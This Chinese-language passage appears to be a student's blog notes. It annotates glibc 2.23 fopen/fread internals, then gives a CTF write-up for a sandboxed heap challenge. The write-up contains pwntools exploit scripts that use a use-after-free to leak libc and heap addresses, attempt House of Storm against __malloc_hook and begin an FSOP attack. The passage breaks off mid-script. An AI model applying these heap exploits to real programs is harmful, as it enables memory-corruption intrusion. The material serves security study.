_IO_FILE *fp;
{
_IO_size_t bytes_requested = size * count;
_IO_size_t bytes_read;
CHECK_FILE (fp, 0); /* 简单检查 */
if (bytes_requested == 0)
return 0;
_IO_cleanup_region_start ((void (*) __P ((void *))) _IO_funlockfile, fp);
_IO_flockfile (fp);
bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested); /* 核心 */
_IO_funlockfile (fp);
_IO_cleanup_region_end (0);
return bytes_requested == bytes_read ? count : bytes_read / size;
}

_IO_fread 函数的功能主要由 _IO_sgetn 函数实现,其他函数都是辅助功能:

1
2
3
4
5
6
7
8
9
_IO_size_t
_IO_sgetn (fp, data, n)
_IO_FILE *fp;
void *data;
_IO_size_t n;
{
/* FIXME handle putback buffer here! */
return _IO_XSGETN (fp, data, n);
}

继续跟进 _IO_XSGETN 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#define _IO_XSGETN(FP, DATA, N) JUMP2 (__xsgetn, FP, DATA, N)

_IO_size_t
_IO_file_xsgetn (fp, data, n)
_IO_FILE *fp;
void *data;
_IO_size_t n;
{
register _IO_size_t want, have;
register _IO_ssize_t count;
register char *s = data; /* 指向需要装入数据的目标变量 */

want = n;

if (fp->_IO_buf_base == NULL) /* 输入缓冲区未建立时 */
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp); /* 建立输入缓冲区 */
}

while (want > 0) /* want为需要的数据 */
{
have = fp->_IO_read_end - fp->_IO_read_ptr; /* 计算拥有的输入缓冲区大小 */
if (want <= have) /* 输入缓冲区够用 */
{
memcpy (s, fp->_IO_read_ptr, want); /* 直接把输入缓冲区拷贝给目标变量 */
fp->_IO_read_ptr += want;
want = 0;
}
else /* 输入缓冲区不够用 */
{
if (have > 0) /* 先把可以用的缓冲区用光 */
{
#ifdef _LIBC
s = __mempcpy (s, fp->_IO_read_ptr, have);
#else
memcpy (s, fp->_IO_read_ptr, have);
s += have;
#endif
want -= have;
fp->_IO_read_ptr += have;
}

/* Check for backup and repeat */
if (_IO_in_backup (fp)) /* 基础检查,可以跳过 */
{
_IO_switch_to_main_get_area (fp);
continue;
}

if (fp->_IO_buf_base && want < fp->_IO_buf_end - fp->_IO_buf_base)
{
if (__underflow (fp) == EOF)
/* 执行系统调用read读取数据,并放入到输入缓冲区里 */
break;

continue;
}

_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* 进行FILE结构体的更新设置 */

count = want;
if (fp->_IO_buf_base)
{
_IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}

count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;

break;
}

s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}

return n - want;
}

_IO_file_xsgetn 是处理 fread 读入数据的核心函数,分为三个部分:

  • 第一部分是 fp->_IO_buf_base 为空的情况,表明此时的FILE结构体中的指针未被初始化,输入缓冲区未建立,则调用 _IO_doallocbuf 去初始化指针,建立输入缓冲区
  • 第二部分是输入缓冲区里有输入并且够用,此时将缓冲区里的数据直接拷贝至目标buff
  • 第三部分是输入缓冲区里的数据为空或者是不能满足全部的需求,则调用 __underflow 调用系统调用读入数据到缓冲区,然后再把数据从缓冲区中复制给用户

建立输入缓冲区

如果输入缓存区未建立,那么程序会调用 _IO_doallocbuf 建立输入缓冲区:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void
_IO_doallocbuf (fp)
_IO_FILE *fp;
{
if (fp->_IO_buf_base) /* 如果输入缓冲区不为空,直接返回(再次检查输入缓存区) */
return;
if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
/* 检查fp->_flags是否为_IO_UNBUFFERED || fp->_mode大于0 */
if (_IO_DOALLOCATE (fp) != EOF) /* 调用vtable函数(_IO_file_doallocate) */
return;
_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
/* 设置_IO_buf_base和_IO_buf_end*/
/* 如果_IO_DOALLOCATE调用失败,那么其内部的_IO_setb将无法调用,可能会出现BUG */
/* 所以在_IO_DOALLOCATE外面再次调用_IO_setb以防万一 */
}

如果条件满足,就会调用 vtable 中的 _IO_file_doallocate(建立输入缓冲区和主体):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# define ALLOC_BUF(_B, _S, _R) \
do { \
(_B) = (char *) mmap (0, ROUND_TO_PAGE (_S), \
PROT_READ | PROT_WRITE, \
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \
if ((_B) == (char *) MAP_FAILED) \
return (_R); \
} while (0)

int
_IO_file_doallocate (fp)
_IO_FILE *fp;
{
_IO_size_t size;
int couldbetty;
char *p;
struct _G_stat64 st;

#ifndef _LIBC
if (_IO_cleanup_registration_needed)
(*_IO_cleanup_registration_needed) ();
#endif

if (fp->_fileno < 0 || _IO_SYSSTAT (fp, &st) < 0)
/* 获取文件信息(vtable->__stat) */
{
couldbetty = 0;
size = _IO_BUFSIZ;
#if 0
/* do not try to optimise fseek() */
fp->_flags |= __SNPT;
#endif
}
else
{
couldbetty = S_ISCHR (st.st_mode);
#if _IO_HAVE_ST_BLKSIZE
size = st.st_blksize <= 0 ? _IO_BUFSIZ : st.st_blksize;
#else
size = _IO_BUFSIZ;
#endif
}
ALLOC_BUF (p, size, EOF); /* 通过mmap分配内存 */
_IO_setb (fp, p, p + size, 1);
if (couldbetty && isatty (fp->_fileno))
fp->_flags |= _IO_LINE_BUF;
return 1;
}

获取文件信息后,利用宏函数 ALLOC_BUF 分配内存,接着调用 _IO_setb :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void
_IO_setb (f, b, eb, a)
_IO_FILE *f;
char *b;
char *eb;
int a;
{
if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
FREE_BUF (f->_IO_buf_base, _IO_blen (f));
f->_IO_buf_base = b;
f->_IO_buf_end = eb;
if (a) /* 设置flag */
f->_flags &= ~_IO_USER_BUF;
else
f->_flags |= _IO_USER_BUF;
}

设置了 _IO_buf_base_IO_buf_end

将缓冲区里的数据直接拷贝至目标buff

1
2
3
4
5
6
7
8
9
10
 while (want > 0) /* want为需要的数据 */
{
have = fp->_IO_read_end - fp->_IO_read_ptr; /* 计算拥有的输入缓冲区大小 */
if (want <= have) /* 输入缓冲区够用 */
{
memcpy (s, fp->_IO_read_ptr, want); /* 直接把输入缓冲区拷贝给目标变量 */
fp->_IO_read_ptr += want;
want = 0;
}
........

这部分比较简单,判断输入缓冲区够用以后,直接就复制给用户缓冲区了(目标变量)

调用系统调用读入数据

如果是输入缓冲区里的数据为空或者是不能满足全部的需求,则会调用 __underflow :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
int
__underflow (fp)
_IO_FILE *fp;
{
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
if (fp->_vtable_offset == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
#endif

if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp); /* vtable->_IO_new_file_underflow */
}

前面的都是检查直接跳过,到后面调用 _IO_UNDERFLOW 才是关键(其实它就vtable里面的 _IO_new_file_underflow):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# define _IO_new_file_underflow _IO_file_underflow

int
_IO_new_file_underflow (fp)
_IO_FILE *fp;
{
_IO_ssize_t count;
#if 0
/* SysV does not make this test; take it out for compatibility */
if (fp->_flags & _IO_EOF_SEEN) /* _flag标志位是否包含_IO_NO_READS */
return (EOF);
#endif

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL) /* 调用_IO_doallocbuf分配输入缓冲区 */
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* Flush all line buffered files before reading. */
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
_IO_flush_all_linebuffered ();

_IO_switch_to_get_mode (fp);

/* 初始化设置FILE结构体指针,将他们都设置成fp->_IO_buf_base */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
/* _IO_SYSREAD == vtable->_IO_file_read,程序最终会调用read */
/* 执行read读取数据到fp->_IO_buf_base,读入大小为输入缓冲区的大小 */
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count; /* 更新输入缓冲区的大小 */
if (count == 0)
return EOF;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}

函数执行完后,返回到 _IO_file_xsgetn 函数中,由于 while 循环的存在,重新执行第二部分,此时将输入缓冲区拷贝至目标缓冲区,最终返回


在 IO_FILE任意读 (基于stdin的地址任意读) 漏洞中,最关键的函数应是 _IO_new_file_underflow ,它里面有个标志位的判断:

1
2
3
4
5
6
if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}

这个漏洞我还不熟,后面熟悉了再慢慢说

IO_FILE源码分析:fopen

连续做了几个 IO_FILE pwn 的题目,发现自己对于 IO_FILE 漏洞的原理不是很了解,于是打算学习学习 IO_FILE 的源码

我打算先学习源码,之后再学习漏洞利用的底层原理

感谢 raycp 师傅的源码讲解!!!


fopen 是IO中最重要的函数之一,每当我们想打开文件时,第一个调用的便是这个函数

先看看它的源码:(libc-2.23)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include "libioP.h"
#ifdef __STDC__
#include <stdlib.h>
#endif
#ifdef _LIBC
# include <shlib-compat.h>
#else
# define _IO_new_fopen fopen
#endif

_IO_FILE *
_IO_new_fopen (filename, mode)
const char *filename;
const char *mode;
{
struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
} *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
/* malloc分配内存空间 */
if (new_f == NULL)
return NULL;
#ifdef _IO_MTSAFE_IO
new_f->fp.file._lock = &new_f->lock;
#endif
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
_IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);
#else /* _IO_no_init对file结构体进行初始化 */
_IO_no_init (&new_f->fp.file, 1, 0, NULL, NULL);
#endif
_IO_JUMPS (&new_f->fp) = &_IO_file_jumps; /* 设置_IO_file_jumps函数表 */
_IO_file_init (&new_f->fp); /* _IO_file_init将结构体链接进_IO_list_all链表 */
#if !_IO_UNIFIED_JUMPTABLES
new_f->fp.vtable = NULL;
#endif
if (_IO_file_fopen ((_IO_FILE *) new_f, filename, mode, 1) != NULL)
return (_IO_FILE *) &new_f->fp; /* 执行系统调用打开文件 */
_IO_un_link (&new_f->fp);
free (new_f);
return NULL;
}

#ifdef _LIBC
strong_alias (_IO_new_fopen, __new_fopen)
versioned_symbol (libc, _IO_new_fopen, _IO_fopen, GLIBC_2_1);
versioned_symbol (libc, __new_fopen, fopen, GLIBC_2_1);
#endif

fopen 实际上是 _IO_new_fopen 函数,前面都是一些初始化的操作:

  • malloc分配内存空间
  • _IO_no_init 对FILE结构体进行 null 初始化
  • _IO_file_init 将结构体链接进 _IO_list_all 链表
  • _IO_file_fopen 执行系统调用打开文件

接下来便分别对它们进行分析:

malloc 分配内存空间

1
*new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));

这个“locked_FILE”是个结构体(就是FILE结构体),包含了3个条目:

1
2
3
4
5
6
7
8
  struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
}

malloc 将会分配“locked_FILE”结构体大小的内存,最后在”fopen“执行完成后释放掉

_IO_no_init 对FILE结构体进行 null 初始化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
void
_IO_no_init (fp, flags, orientation, wd, jmp)
_IO_FILE *fp;
int flags;
int orientation;
struct _IO_wide_data *wd;
struct _IO_jump_t *jmp;
{
fp->_flags = _IO_MAGIC|flags;
fp->_IO_buf_base = NULL;
fp->_IO_buf_end = NULL;
fp->_IO_read_base = NULL;
fp->_IO_read_ptr = NULL;
fp->_IO_read_end = NULL;
fp->_IO_write_base = NULL;
fp->_IO_write_ptr = NULL;
fp->_IO_write_end = NULL;
fp->_chain = NULL; /* Not necessary. */

fp->_IO_save_base = NULL;
fp->_IO_backup_base = NULL;
fp->_IO_save_end = NULL;
fp->_markers = NULL;
fp->_cur_column = 0;
#if _IO_JUMPS_OFFSET
fp->_vtable_offset = 0;
#endif
#ifdef _IO_MTSAFE_IO
_IO_lock_init (*fp->_lock);
#endif
fp->_mode = orientation;
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
if (orientation >= 0)
{
fp->_wide_data = wd; /* 初始化fp的_wide_data字段 */
fp->_wide_data->_IO_buf_base = NULL;
fp->_wide_data->_IO_buf_end = NULL;
fp->_wide_data->_IO_read_base = NULL;
fp->_wide_data->_IO_read_ptr = NULL;
fp->_wide_data->_IO_read_end = NULL;
fp->_wide_data->_IO_write_base = NULL;
fp->_wide_data->_IO_write_ptr = NULL;
fp->_wide_data->_IO_write_end = NULL;
fp->_wide_data->_IO_save_base = NULL;
fp->_wide_data->_IO_backup_base = NULL;
fp->_wide_data->_IO_save_end = NULL;

fp->_wide_data->_wide_vtable = jmp;
}
#endif
}

对 _IO_FILE_plus 里面的条目进行置空操作,对 _IO_wide_data 进行赋值并置空

_IO_file_init 将结构体链接进 _IO_list_all 链表

1
2
3
4
5
6
7
8
9
10
11
12
# define _IO_new_file_init _IO_file_init

void
_IO_new_file_init (fp)
struct _IO_FILE_plus *fp;
{
fp->file._offset = _IO_pos_BAD;
fp->file._IO_file_flags |= CLOSED_FILEBUF_FLAGS;

_IO_link_in (fp);
fp->file._fileno = -1;
}

这个函数完成了一些设置(暂时不用管)调用了 _IO_link_in

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void
_IO_link_in (fp)
struct _IO_FILE_plus *fp;
{
if ((fp->file._flags & _IO_LINKED) == 0)
/* 检查FILE结构体是否包含_IO_LINKED标志 */
{
fp->file._flags |= _IO_LINKED;
#ifdef _IO_MTSAFE_IO
_IO_lock_lock (list_all_lock); /* 加锁 */
#endif
fp->file._chain = (_IO_FILE *) _IO_list_all;
_IO_list_all = fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock); /* 解锁 */
#endif
}
}

_chain 字段(指向FILE链表的下一个单元)写入 _IO_list_all ,然后在 _IO_list_all 写入 fp ,此时 fp 成为了FILE链表的头部(全局变量 _IO_list_all 永远指向了FILE链表的头部 )

​ // 标准的插头法,和 fastbin,smallbin,unsortedbin 差不多

_IO_file_fopen 打开文件句柄

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# define _IO_new_file_fopen _IO_file_fopen

_IO_FILE *
_IO_new_file_fopen (fp, filename, mode, is32not64)
_IO_FILE *fp;
const char *filename;
const char *mode;
int is32not64;
{
int oflags = 0, omode;
int read_write;
int oprot = 0666;
int i;
_IO_FILE *result;
#if _LIBC
const char *cs;
#endif

if (_IO_file_is_open (fp)) /* 检查文件描述符是否打开 */
return 0;
switch (*mode) /* 设置文件打开的模式(权限&类型) */
{
case 'r':
omode = O_RDONLY; /* 只读 */
read_write = _IO_NO_WRITES;
break;
case 'w':
omode = O_WRONLY; /* 只写 */
oflags = O_CREAT|O_TRUNC;
read_write = _IO_NO_READS;
break;
case 'a':
omode = O_WRONLY; /* 只写 */
oflags = O_CREAT|O_APPEND;
read_write = _IO_NO_READS|_IO_IS_APPENDING;
break;
default:
__set_errno (EINVAL); /* 设置错误代码 */
return NULL;
}
for (i = 1; i < 4; ++i)
{
switch (*++mode) /* 设置文件打开的模式(附加) */
{
case '\0': /* 无附加 */
break;
case '+': /* 附加读&写权限 */
omode = O_RDWR;
read_write &= _IO_IS_APPENDING;
continue;
case 'x': /* 附加可执行权限 */
oflags |= O_EXCL;
continue;
case 'b': /* 以二进制的形式进行读写 */
default:
continue;
}
break;
}

result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
is32not64);
/* 调用_IO_file_open系统调用进行文件读取,后面的操作就不用管了 */

#if _LIBC
/* Test whether the mode string specifies the conversion. */
cs = strstr (mode, ",ccs=");
if (cs != NULL)
{
/* Yep. Load the appropriate conversions and set the orientation
to wide. */
struct gconv_fcts fcts;
struct _IO_codecvt *cc;

if (! _IO_CHECK_WIDE (fp) || __wcsmbs_named_conv (&fcts, cs + 5) != 0)
{
/* Something went wrong, we cannot load the conversion modules.
This means we cannot proceed since the user explicitly asked
for these. */
_IO_new_fclose (result);
return NULL;
}

cc = fp->_codecvt = &fp->_wide_data->_codecvt;

/* The functions are always the same. */
*cc = __libio_codecvt;

cc->__cd_in.__cd.__nsteps = 1; /* Only one step allowed. */
cc->__cd_in.__cd.__steps = fcts.towc;

cc->__cd_in.__cd.__data[0].__invocation_counter = 0;
cc->__cd_in.__cd.__data[0].__internal_use = 1;
cc->__cd_in.__cd.__data[0].__flags = __GCONV_IS_LAST;
cc->__cd_in.__cd.__data[0].__statep = &result->_wide_data->_IO_state;

cc->__cd_out.__cd.__nsteps = 1; /* Only one step allowed. */
cc->__cd_out.__cd.__steps = fcts.tomb;

cc->__cd_out.__cd.__data[0].__invocation_counter = 0;
cc->__cd_out.__cd.__data[0].__internal_use = 1;
cc->__cd_out.__cd.__data[0].__flags = __GCONV_IS_LAST;
cc->__cd_out.__cd.__data[0].__statep = &result->_wide_data->_IO_state;

/* Set the mode now. */
result->_mode = 1;
}
#endif /* GNU libc */

return result;
}

程序会先检查文件描述符是否打开,然后在 Switch-Case 里面设置文件打开的模式


fopen 只是开胃菜,还没有什么漏洞,接下来的 fread 就是重点了

x_heap

1
2
3
4
5
6
➜  桌面 ./chall                                  
1.add
2.delete
3.edit
4.show
>
1
2
3
4
5
6
7
 chall: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a9ca4e5f4f591a5343f4c0d406006bde41b14d38, stripped                             
[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

64位,dynamically,全开

1
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11) stable release versio
1
2
3
4
5
6
7
8
9
10
11
➜  桌面 seccomp-tools dump ./chall 
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL

漏洞分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
unsigned __int64 delete()
{
int index; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("which chunk you want to delete?");
scanf("%d", &index);
if ( index < 0 || index > 7 )
{
puts("index error.");
}
else if ( chunk_list[index] )
{
free((void *)chunk_list[index]); // UAF
puts("delete success.");
}
return __readfsqword(0x28u) ^ v2;
}

申请模块:UAF漏洞,但这也意味着我们只能申请8个chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
unsigned __int64 edit()
{
int index; // [rsp+4h] [rbp-Ch] BYREF 似乎可以溢出
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
if ( edit_chance ) // 只能修改两次
{
puts("which chunk you want to edit?");
scanf("%d", &index);
if ( index < 0 || index > 7 ) // 限制index
{
puts("index error.");
}
else if ( chunk_list[index] )
{
puts("content:");
read(0, (void *)chunk_list[index], size_list[index]);
puts("edit success.");
--edit_chance;
}
}
else
{
puts("You can only edit twice.");
}
return __readfsqword(0x28u) ^ v2;
}

修改模块:index 采用“int”类型,可以为负数(同时用整数溢出逃避检查)

入侵思路

程序限制点:

  • 程序开了沙盒(掐掉了 execve),那么就只能打 ORW
  • 申请模块限制了“size”大小,只能申请 largechunk
  • 申请模块只能执行8次
  • 修改模块和释放模块都只能执行2次

因为有UAF,所以 leak libc_base 很好办:

1
2
3
4
5
6
7
8
9
10
add(0x410,'aaaa')
add(0x410,'aaaa')
delete(0)
show(0)

p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

接下来试试看 House Of Storm(这里我重新调整了一下 leak 的代码)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
add(0x428,'aaaa')#0(unsorted)
add(0x428,'aaaa')#1
add(0x418,'aaaa')#2(large)
add(0x418,'aaaa')#3
delete(2)
delete(0)
show(2)

p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
free_hook=libc_base+libc.sym['__free_hook']
success('free_hook >> '+hex(free_hook))

add(0x428,'aaaa')#4(unsorted)
delete(4)
1
2
3
4
unsortedbin
all: 0x564cc7b72540 —▸ 0x7f2f65fd4b78 (main_arena+88) ◂— 0x564cc7b72540
largebins
0x400: 0x564cc7b72da0 —▸ 0x7f2f65fd4f68 (main_arena+1096) ◂— 0x564cc7b72da0

接下来就要进行修改:

  • unsorted_chunk->BK => fake_chunk
  • large_chunk->BK => fake_chunk+8
  • large_chunk->BK_nextsize => fake_chunk-0x18-5

刚好用完程序的两次修改机会:

1
2
3
4
5
6
7
8
9
main_arena1=libc_base+3951480
main_arena2=libc_base+3952488
payload1=p64(main_arena1)+p64(free_hook)
payload2=p64(main_arena2)+p64(free_hook+8)+p64(0)+p64(free_hook-0x18-5)

edit(0,payload1)
edit(2,payload2)

add(0x400,one_gadget)

这里我其实想偷懒,试试看不伪造 large_chunk->FD_nextsize 可不可行,结果报错了,只好老老实实泄露 heap_base 了

完成攻击后还是报错了(想不明白为什么),先挂一下 House Of Storm 的代码,以后熟悉 House Of Storm 了再慢慢看:(这个题目是开了沙盒的,所以用“one_gadget”肯定不行,但我这里懒得改了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *

p=process('./chall')
libc=ELF('./libc-2.23.so')
elf=ELF('./chall')

#context.log_level = 'debug'

def add(size,content): # 0x410 ~ 0xa9be
p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(size))
p.sendafter('content:\n',content)

def delete(index):
p.sendlineafter('> ',str(2))
p.sendlineafter('which chunk you want to delete?\n',str(index))

def edit(index,content):
p.sendlineafter('> ',str(3))
p.sendlineafter('which chunk you want to edit?\n',str(index))
p.sendafter('content:\n',content)

def show(index):
p.sendlineafter('> ',str(4))
p.sendlineafter('which chunk you want to show?\n',str(index))

#gdb.attach(p)

add(0x428,'aaaa')#0(unsorted)
add(0x428,'aaaa')#1
add(0x418,'aaaa')#2(large)
add(0x418,'aaaa')#3
delete(2)
delete(0)

show(2)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
one_gadget_list=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=one_gadget_list[2]+libc_base
success('free_hook >> '+hex(free_hook))
success('malloc_hook >> '+hex(malloc_hook))

show(0)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap_base=leak_addr-3488
success('leak_addr >> '+hex(leak_addr))
success('heap_base >> '+hex(heap_base))

add(0x428,'aaaa')#4(unsorted)
delete(4)

main_arena1=libc_base+3951480
main_arena2=libc_base+3952488
heap_addr=heap_base+3488
payload1=p64(main_arena1)+p64(malloc_hook)
payload2=p64(main_arena2)+p64(malloc_hook+8)+p64(heap_addr)+p64(malloc_hook-0x18-5)

edit(0,payload1)
edit(2,payload2)
add(0x410,one_gadget)

p.interactive()

学长说这个题要用 FSOP 来打,刚好前几天整理的 IO pwn 中就有 FSOP,当时还没有进行题目练习,可以用这个题来练练手

以下代码就是我的第一次尝试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
from pwn import *

p=process('./chall')
libc=ELF('./libc-2.23.so')
elf=ELF('./chall')

#context.log_level = 'debug'
context.arch = "amd64"

def add(size,content): # 0x410 ~ 0xa9be
p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(size))
p.sendafter('content:\n',content)

def delete(index):
p.sendlineafter('> ',str(2))
p.sendlineafter('which chunk you want to delete?\n',str(index))

def edit(index,content):
p.sendlineafter('> ',str(3))
p.sendlineafter('which chunk you want to edit?\n',str(index))
p.sendafter('content:\n',content)

def show(index):
p.sendlineafter('> ',str(4))
p.sendlineafter('which chunk you want to show?\n',str(index))

#gdb.attach(p)
add(0x6b0,'hehehehe')#0
add(0x428,'./flag\x00')#1
delete(0)

show(0)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
system_libc=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
io_list_all=libc_base+libc.sym['_IO_list_all']
one_gadget_list=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=one_gadget_list[2]+libc_base
success('free_hook >> '+hex(free_hook))
